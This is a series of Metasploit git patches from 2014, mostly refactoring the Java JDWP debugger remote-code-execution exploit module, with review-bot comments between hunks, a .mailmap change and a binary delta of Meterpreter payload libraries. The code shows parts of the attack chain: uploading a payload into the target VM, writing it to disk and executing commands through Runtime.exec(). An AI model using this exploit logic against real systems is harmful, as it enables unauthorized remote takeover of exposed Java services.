--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -328,10 +328,10 @@ class Metasploit3 < Msf::Exploit::Remote return unless @classes.empty? formats = [ - ["C", "reftype_tag"], - [@vars["referencetypeid_size"], "reftype_id"], - ["S", "signature"], - ["I", "status"] + ["C", "reftype_tag"], + [@vars["referencetypeid_size"], "reftype_id"], + ["S", "signature"], + ["I", "status"] ] sock.put(create_packet(ALLCLASSES_SIG)) response = read_reply @@ -376,14 +376,15 @@ class Metasploit3 < Msf::Exploit::Remote if signature.nil? return entry if entry["name"].downcase == name.downcase else - return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase) + if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase + return entry + end end end nil end - # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) target_class = get_class_by_name(looked_class) @@ -396,7 +397,6 @@ class Metasploit3 < Msf::Exploit::Remote return target_class, target_method end - # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str2fqclass(s) i = s.rindex(".") @@ -411,7 +411,6 @@ class Metasploit3 < Msf::Exploit::Remote return classname, method end - # Resumes execution of the application after the suspend command or an event has stopped it def resume_vm sock.put(create_packet(RESUMEVM_SIG)) @@ -420,7 +419,6 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "No network response") unless response end - # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) data = [event_code].pack('C') 
@@ -438,7 +436,6 @@ class Metasploit3 < Msf::Exploit::Remote return response.unpack('N')[0] end - # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) @@ -447,7 +444,6 @@ class Metasploit3 < Msf::Exploit::Remote return buf end - # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket def force_net_event print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") @@ -470,7 +466,6 @@ class Metasploit3 < Msf::Exploit::Remote remove_socket(rex_socket) end - # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) r_id = buf[6..9].unpack('N')[0] @@ -483,7 +478,6 @@ class Metasploit3 < Msf::Exploit::Remote return r_id, t_id end - # Clear a defined event request def clear_event(event_code, r_id) data = [event_code].pack('C') @@ -492,7 +486,6 @@ class Metasploit3 < Msf::Exploit::Remote read_reply end - # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) @@ -511,7 +504,6 @@ class Metasploit3 < Msf::Exploit::Remote buf end - # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) 
@@ -531,7 +523,6 @@ class Metasploit3 < Msf::Exploit::Remote buf end - # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. def create_instance(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) @@ -549,7 +540,6 @@ class Metasploit3 < Msf::Exploit::Remote buf end - def temp_path return nil unless datastore['TMP_PATH'] unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') @@ -558,7 +548,6 @@ class Metasploit3 < Msf::Exploit::Remote datastore['TMP_PATH'] end - # Configures payload according to targeted architecture def setup_payload # 1. Setting up generic values. @@ -623,19 +612,24 @@ class Metasploit3 < Msf::Exploit::Remote file end - # Stores the payload on a new string created in target VM def upload_payload(thread_id, pl_exe) size = @vars["objectid_size"] runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>") buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + unless buf[0] == [TAG_OBJECT].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") + end decoder = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to create Base64 decoder object") if decoder.nil? || (decoder == 0) + if decoder.nil? || decoder == 0 + fail_with(Failure::Unknown, "Failed to create Base64 decoder object") + end cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}") - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + if cmd_obj_ids.length == 0 + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") + end cmd_obj_id = cmd_obj_ids[0]["obj_id"] data = [TAG_OBJECT].pack('C') 
@@ -643,7 +637,9 @@ class Metasploit3 < Msf::Exploit::Remote data_array = [data] runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") unless buf[0] == [TAG_ARRAY].pack('C') + unless buf[0] == [TAG_ARRAY].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") + end pl = unformat(size, buf[1..1+size-1]) pl @@ -657,7 +653,9 @@ class Metasploit3 < Msf::Exploit::Remote data_array = [data] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::Unknown, "Exception ocurred when writing to file") unless buf[0] == [TAG_VOID].pack('C') + unless buf[0] == [TAG_VOID].pack('C') + fail_with(Failure::Unknown, "Exception while writing to file") + end end # Closes a file on the server given a execution thread @@ -665,7 +663,9 @@ class Metasploit3 < Msf::Exploit::Remote size = @vars["objectid_size"] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) - fail_with(Failure::Unknown, "Exception ocurred when closing file") unless buf[0] == [TAG_VOID].pack('C') + unless buf[0] == [TAG_VOID].pack('C') + fail_with(Failure::Unknown, "Exception while closing file") + end end # Executes a system command on target VM making use of java.lang.Runtime.exec() 
@@ -674,27 +674,37 @@ class Metasploit3 < Msf::Exploit::Remote # 1. Creates a string on target VM with the command to be executed cmd_obj_ids = create_string(cmd) - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + if cmd_obj_ids.length == 0 + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") + end cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets Runtime context runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime") buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + unless buf[0] == [TAG_OBJECT].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") + end rt = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") if rt.nil? || (rt == 0) + if rt.nil? || (rt == 0) + fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") + end # 3. Finds and executes "exec" method supplying the string with the command exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec") - fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") if exec_meth.nil? + if exec_meth.nil? + fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") + end data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + unless buf[0] == [TAG_OBJECT].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") + end end # Sets a breakpoint on frequently called method (user-defined) 
@@ -704,11 +714,15 @@ class Metasploit3 < Msf::Exploit::Remote # 1. Gets reference of the method where breakpoint is going to be setted classname, method = str2fqclass(datastore['BREAKPOINT']) break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") unless break_class + unless break_class + fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") + end get_methods(break_class["reftype_id"]) m = get_method_by_name(break_class["reftype_id"], method) - fail_with(Failure::BadConfig, "Method of Break Class not found") unless m + unless m + fail_with(Failure::BadConfig, "Method of Break Class not found") + end # 2. Sends event request for this method loc = [TYPE_CLASS].pack('C') @@ -718,7 +732,9 @@ class Metasploit3 < Msf::Exploit::Remote data = [[MODKIND_LOCATIONONLY, loc]] r_id = send_event(EVENT_BREAKPOINT, data) - fail_with(Failure::Unknown, "Could not set the breakpoint") unless r_id + unless r_id + fail_with(Failure::Unknown, "Could not set the breakpoint") + end r_id end From b76253f9ffb0941bfb7135db77e6a42bbe9fc633 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:25:01 -0500 Subject: [PATCH 492/853] Add context to the socket --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index aefb7c55ae..4c3c7a5991 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
@@ -450,7 +450,12 @@ class Metasploit3 < Msf::Exploit::Remote rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, - 'PeerPort' => datastore['BREAKPOINT_PORT'] + 'PeerPort' => datastore['BREAKPOINT_PORT'], + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self, + } ) add_socket(rex_socket) From bb77327b09e150020aa493b31a606f075d2864af Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:50:18 -0500 Subject: [PATCH 493/853] Warn the user if the detected platform doesnt match target --- .../exploits/multi/misc/java_jdwp_debugger.rb | 61 +++++++++++-------- 1 file changed, 36 insertions(+), 25 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 4c3c7a5991..e1b12bbf70 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
@@ -388,19 +388,25 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) target_class = get_class_by_name(looked_class) - fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") unless target_class + unless target_class + fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") + end get_methods(target_class["reftype_id"]) target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) - fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method + unless target_method + fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") + end return target_class, target_method end # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") - def str2fqclass(s) + def str_to_fq_class(s) i = s.rindex(".") - fail_with(Failure::BadConfig, 'Bad defined break class') unless i + unless i + fail_with(Failure::BadConfig, 'Bad defined break class') + end method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string @@ -416,7 +422,9 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(create_packet(RESUMEVM_SIG)) response = read_reply - fail_with(Exploit::Failure::Unknown, "No network response") unless response + unless response + fail_with(Exploit::Failure::Unknown, "No network response") + end end # Sets an event request. When the event described by this request occurs, an event is sent from the target VM 
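Review bot: The reformatted `unless response` block in `resume_vm` looks unreachable, because `read_reply`, as shown in the earlier hunks on this page, already calls `fail_with(Failure::TimeoutExpired, ...)` when `sock.get` returns nothing. The block also spells the constant `Exploit::Failure::Unknown`, while `get_class_and_method` in this same commit uses `Failure::Unknown`. I would delete the check, or at least write it as `fail_with(Failure::Unknown, "#{peer} - No network response")`. The same applies to the `send_event` hunk (`-432`) that follows.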
@@ -432,20 +440,14 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(create_packet(EVENTSET_SIG, data)) response = read_reply - fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") unless response + unless response + fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") + end return response.unpack('N')[0] end - # Waits user defined time for an event sent from the target VM (or force event if possible) - def wait_for_event - force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) - buf = read_reply(datastore['BREAK_TIMEOUT']) - - return buf - end - # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket - def force_net_event + def force_http_event print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( @@ -454,7 +456,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Context' => { 'Msf' => framework, - 'MsfExploit' => self, + 'MsfExploit' => self } ) @@ -492,7 +494,8 @@ class Metasploit3 < Msf::Exploit::Remote end # Invokes a static method. The method must be member of the class type or one of its superclasses, - # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private + # methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) 
@@ -510,7 +513,8 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 # Invokes a instance method. The method must be member of the object's type or one of its superclasses,
- # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked.
+ # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods
+ # can be invoked.
 def invoke(obj_id, thread_id, class_id, meth_id, args = [])
 data = format(@vars["objectid_size"], obj_id)
 data << format(@vars["objectid_size"], thread_id)
@@ -528,7 +532,8 @@ class Metasploit3 < Msf::Exploit::Remote
 buf
 end
- # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type.
+ # Creates a new object of specified class, invoking the specified constructor. The constructor
+ # method ID must be a member of the class type.
 def create_instance(class_id, thread_id, meth_id, args = [])
 data = format(@vars["referencetypeid_size"], class_id)
 data << format(@vars["objectid_size"], thread_id)
@@ -564,11 +569,15 @@ class Metasploit3 < Msf::Exploit::Remote
 when 'linux'
 path = temp_path || '/tmp/'
 payload_exe = "#{path}#{payload_exe}"
- when 'windows'
+ if @os.downcase =~ /win/
+ print_warning("#{peer} - #{@os} system detected but using Linux target...")
+ end
+ when 'win'
 path = temp_path || './'
 payload_exe = "#{path}#{payload_exe}.exe"
- else
- fail_with(Failure::NoTarget, 'Unsupported target platform')
+ unless @os.downcase =~ /win/
+ print_warning("#{peer} - #{@os} system detected but using Windows target...")
+ end
 end
 return payload_exe, pl_exe
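Review bot: In the `@@ -564,11 +569,15 @@` hunk, removing the `else` branch means a target platform other than `'linux'` or `'win'` now falls out of the `case` silently, with no path prepended to `payload_exe`, where the old code stopped with `Failure::NoTarget`; I would keep `else` followed by `fail_with(Failure::NoTarget, 'Unsupported target platform')`. The new mismatch test `@os.downcase =~ /win/` is unanchored, so any detected OS string that merely contains "win" counts as Windows; `@os.to_s =~ /\Awindows/i` is stricter and also survives a nil `@os`, assuming `@os` holds the OS name reported by the target VM. The `case` expression and the start of the method are outside the hunk, so whether `'win'` is the value actually switched on cannot be confirmed from here.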
@@ -665,7 +674,6 @@ class Metasploit3 < Msf::Exploit::Remote
 # Closes a file on the server given a execution thread
 def close_file(thread_id, file)
- size = @vars["objectid_size"]
 runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
 buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
 unless buf[0] == [TAG_VOID].pack('C')
@@ -717,7 +725,7 @@ class Metasploit3 < Msf::Exploit::Remote
 vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}")
 # 1. Gets reference of the method where breakpoint is going to be setted
- classname, method = str2fqclass(datastore['BREAKPOINT'])
+ classname, method = str_to_fq_class(datastore['BREAKPOINT'])
 break_class = get_class_by_name(classname)
 unless break_class
 fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application")
@@ -809,7 +817,10 @@ class Metasploit3 < Msf::Exploit::Remote
 ret = ""
 datastore['NUM_RETRIES'].times do |i|
 print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
- buf = wait_for_event
+ if datastore['BREAKPOINT_PORT'] && datastore['BREAKPOINT_PORT'] > 0
+ force_http_event
+ end
+ buf = read_reply(secs)
 ret = parse_event_breakpoint(buf, r_id)
 break unless ret.nil?
 end
From c9bd0ca9950f3775cefa9ef5a2ea2e4eed6cab06 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 4 Jun 2014 15:56:14 -0500
Subject: [PATCH 494/853] Add minor changes
---
 modules/exploits/multi/misc/java_jdwp_debugger.rb | 11 +++--------
 1 file changed, 3 insertions(+), 8 deletions(-)
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
index e1b12bbf70..4d5d43dc96 100644
--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -116,13 +116,13 @@ class Metasploit3 < Msf::Exploit::Remote OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), - OptPort.new('BREAKPOINT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection' ]) + OptPort.new('BREAKPOINT_PORT', [ false, 'HTTP port to trigger breakpoint automatically (Ex. 8080 on tomcat)' ]) ], self.class) register_advanced_options( [ - OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), - OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) + OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]), + OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]) ], self.class) end @@ -210,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote ret end - # Pack Fixnum for JDWP protocol def format(fmt, value) if fmt == "L" || fmt == 8 @@ -285,7 +284,6 @@ class Metasploit3 < Msf::Exploit::Remote entries end - # Gets the sizes of variably-sized data types in the target VM def get_sizes formats = [ @@ -301,7 +299,6 @@ class Metasploit3 < Msf::Exploit::Remote entries.each { |e| @vars.merge!(e) } end - # Gets the JDWP version implemented by the target VM def get_version formats = [ @@ -317,12 +314,10 @@ class Metasploit3 < Msf::Exploit::Remote entries.each { |e| @vars.merge!(e) } end - def version "#{@vars["vm_name"]} - #{@vars["vm_version"]}" end - # Returns reference types for all classes currently loaded by the target VM def get_all_classes return unless @classes.empty? From e7957bf9990ca44d5a0ce0301d3319ed9f4a3615 Mon Sep 17 00:00:00 2001 
From: Julian Vilas <julian.vilas@gmail.com>
Date: Thu, 5 Jun 2014 01:33:00 +0200
Subject: [PATCH 495/853] Change GET request by random text
---
 modules/exploits/multi/misc/java_jdwp_debugger.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
index 4d5d43dc96..73e838bfc0 100644
--- a/modules/exploits/multi/misc/java_jdwp_debugger.rb
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -442,7 +442,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket
- def force_http_event
+ def force_net_event
 print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}")
 rex_socket = Rex::Socket::Tcp.create(
@@ -457,7 +457,7 @@ class Metasploit3 < Msf::Exploit::Remote
 add_socket(rex_socket)
- rex_socket.put("GET / HTTP/1.0\r\n\r\n")
+ rex_socket.put(rand_text_alphanumeric(4 + rand(4)))
 begin
 rex_socket.shutdown
@@ -813,7 +813,7 @@ class Metasploit3 < Msf::Exploit::Remote
 datastore['NUM_RETRIES'].times do |i|
 print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...")
 if datastore['BREAKPOINT_PORT'] && datastore['BREAKPOINT_PORT'] > 0
- force_http_event
+ force_net_event
 end
 buf = read_reply(secs)
 ret = parse_event_breakpoint(buf, r_id)
From 8747273b0188cd4b44dc49df37013429f2b28906 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 5 Jun 2014 10:40:38 -0500
Subject: [PATCH 496/853] Add @trosen-r7's alias for commits

Just so quick counts of contributors is slightly more accurate and @trosen-r7 doesn't accidentally get double counted.
---
 .mailmap | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.mailmap b/.mailmap
index 713206e261..79a858c2a7 100644
--- a/.mailmap
+++ b/.mailmap
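Review bot: In the `@@ -457,7 +457,7 @@` hunk of java_jdwp_debugger.rb, the bytes written to the socket are no longer an HTTP request, yet nothing next to the `put` says why random text is sent. The `BREAKPOINT_PORT` help text set by the previous patch in this series still reads `'HTTP port to trigger breakpoint automatically (Ex. 8080 on tomcat)'`. I would add a one-line comment above the `put` stating the intent (presumably that the content is irrelevant and only the connection matters). I would also reword the option to something protocol-neutral such as `'Port of the debugged application to connect to so the breakpoint is triggered automatically'`. The method body starts and ends outside the hunk.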
@@ -18,6 +18,7 @@ todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
 todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
 trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
+trosen-r7 <trosen-r7@github> Trevor Rosen <trevor@catapult-creative.com>
 wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
 wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
From 737f06f60000d857e075d46e45dcbe1e85e6c606 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 5 Jun 2014 17:17:32 -0500
Subject: [PATCH 497/853] Add Meterpreter bins for release branch.

This contains the same bins as #3423, but it is targeted at the release branch for rapid7/metasploit-framework.
---
 data/meterpreter/common.lib | Bin 576388 -> 577224 bytes
 data/meterpreter/elevator.x64.dll | Bin 90624 -> 90624 bytes
 data/meterpreter/elevator.x86.dll | Bin 78336 -> 78336 bytes
 data/meterpreter/ext_server_espia.x64.dll | Bin 203776 -> 203776 bytes
 data/meterpreter/ext_server_espia.x86.dll | Bin 203264 -> 203264 bytes
 data/meterpreter/ext_server_extapi.x64.dll | Bin 147968 -> 147456 bytes
 data/meterpreter/ext_server_extapi.x86.dll | Bin 124416 -> 124416 bytes
 data/meterpreter/ext_server_incognito.x64.dll | Bin 106496 -> 106496 bytes
 data/meterpreter/ext_server_incognito.x86.dll | Bin 98816 -> 98816 bytes
 data/meterpreter/ext_server_kiwi.x64.dll | Bin 284160 -> 284160 bytes
 data/meterpreter/ext_server_kiwi.x86.dll | Bin 245760 -> 245760 bytes
 .../meterpreter/ext_server_lanattacks.x64.dll | Bin 227840 -> 227840 bytes
 .../meterpreter/ext_server_lanattacks.x86.dll | Bin 180736 -> 180736 bytes
 data/meterpreter/ext_server_mimikatz.x64.dll | Bin 541696 -> 541696 bytes
 data/meterpreter/ext_server_mimikatz.x86.dll | Bin 406528 -> 406528 bytes
 data/meterpreter/ext_server_priv.x64.dll | Bin 135168 -> 135168 bytes
 data/meterpreter/ext_server_priv.x86.dll | Bin 114176 -> 114176 bytes
 data/meterpreter/ext_server_stdapi.jar | Bin 38782 -> 38782 bytes
 data/meterpreter/ext_server_stdapi.py | 121 ++++++++----
 data/meterpreter/ext_server_stdapi.x64.dll | Bin 411648 -> 411648 bytes
 data/meterpreter/ext_server_stdapi.x86.dll | Bin 377344 -> 377344 bytes
 data/meterpreter/meterpreter.jar | Bin 24427 -> 24427 bytes
 data/meterpreter/meterpreter.py | 184 +++++++++++-------
 data/meterpreter/metsrv.x64.dll | Bin 972800 -> 972800 bytes
 data/meterpreter/metsrv.x86.dll | Bin 770048 -> 770048 bytes
 data/meterpreter/screenshot.x64.dll | Bin 202752 -> 202752 bytes
 data/meterpreter/screenshot.x86.dll | Bin 202752 -> 202752 bytes
 27 files changed, 194 insertions(+), 111 deletions(-)
diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib index dc6eda39745b333bf6107c17bae35293514b2ce4..17f9de46f01db9bc9b5ffd39b1aea7d5cfbc0d40 100755 GIT binary patch delta 35638 zcmchA2V4}#-~P-Vu*U%cic}R46~smp!LEoEOB7oyfP#twB4F1XDt2RAbnGn}dqq8? zF=}F>i47B@CYo4diyDn7CK~-eGrPCIFTeNyLdv@zxaZktzEgJhJ8gGwE{_GATp2Lm z%NP+777`L37P`RS%N!BrC$>ZrA=HhKChPxC|IPo`8U9Cp=6~d9Y1UElr~fG#g#NGp z=F%9!W@pR)`Tz6`LjR}#Zwm?i|NWbb2mX;y=>PG*`QOM;Vj+b8%M*V8-~P@2o58;v zZq`cpZF?f~|3^V(`ZxN|AZ7aRS%Vmh{}0L>M2!E||Ne`_cqEPgE1CXPl;8b**~>&) zRq0#RSn$GTy(4?&AQ^2E(o!-C=DVJds*f0zo|%<Cq<eB&YUYq(<Hn5Yo-u0hsMKMp z{IhFvR{H3)<RL6Hht_v#*&rq+vPDcxcx+^=(3pr;1xMXHOvM^D&o1HhqpU5P3n65E z6GDz=QIau*l9oFunQ@wu!fz?b|AUecCXwGK$fW(ZG6{MllNtU-QlqDl49YZ;i~Efv z?TC@M6}0g^M+@Bi8`=Mza<Y2)QfR^b;0~q|2fs=x_^81XL$L$!DEPe52C55+xrvXf z+Egc+lBZQCrfc)N{i1Ab;$wFcM|ahh&7VT6+OJ6`<O4fG`YXRS36O%PvZD{=s`kkS zLe@<s#7=3`G=Q3vVNC;Vd(0ukOJPkrNP*AUuJ7flb`D6V?sJx#N2}UW@MtBxS)kPL zIV;SgHKbS(QbX#hTG*khApNwk5t>#J+FM!*{G2OFhvtFOJI`4N(zIVA5pwD!A;Xl_ z%>xWCY$=<RNBw1<kh`6><AI%E>kdz@g>}aVJ3XvB6|ghHx>FfDdDfk3*ja1c@y5=_ z)}0{iT(j<QGg;O$4Zuz<>y9sWI$3vk(&^S6FYL^+?)YQp9qUdd>>S6=jq!4IdR-Y7 z)BkU|NZ}%>e#B~|nMA0opXt0uOvAoIQ!<97W@PsrJv?hzc4pGRl)fEPa#FG~v-oG7 zo~aqh!$)Vc!s|3xIo_%@YjJ~mGRIfcXe%R~%SuQrqbrq@u>+}NLG9MJsPa*#@&*2F z>r$nlTls>dcEJXEM41!!j4mn2?HEJp>Vo5)PEfkEU``hYN|zNZd80F>Ym|FkPbuL& z%d_YKw4AcKV-;oRSflb=w+Hm&g4^+fDg8i+>v31P6<=P7?fEXfsyys@mv$()&}$&2 z?F*vbY(wdlg4{lRC|#^v?fU~grX(g+RBrS;NLj&({vS#7XhCAqYD&LaIPe7hS~)pz zC*7=!Nsg9(>_JFpnyswq;h~&Mo<J>1TuMXwqcT0^C%RvmFsM1W%M7oAi-Y=6x=)E1 z!UKm7*+mN!ztk4s15&rsy^71wSnwW0$I|sm;n2qP#{#Ee-c;$9UO{P?RtG^t(!Qtf zD)H$}5VSBIX>C-VWbmE3!#7a6PPvd71uLf!>*#W2*9at_JQ^{Xt|-XN!dY5dFd@4F zrSB;7bDAQ`xtt(MH!06YHlxoAqDBp;bc?cSbR)#MJ$fG9s^pAm<f<JPaV4&<yux@X zN5>qZ+ms1oONO;YSaiY3vCAplt|X6dNWGNR<D1jx%JuOZ=?-Pag#TuKVL~HHcPcJ# zHT-iv1%2L%qjZ<D$y_opgcqXVnK^>e-Ad3T9EUP^(h|C7;pAqZ%_rZb2b7>G&8k}q zULFPK70at9zd&g@St%)mYa$(G&XgDQJ!M8-Q~d%STjs9Z%FCe#m0nZ7pzkZSr!_1Q 
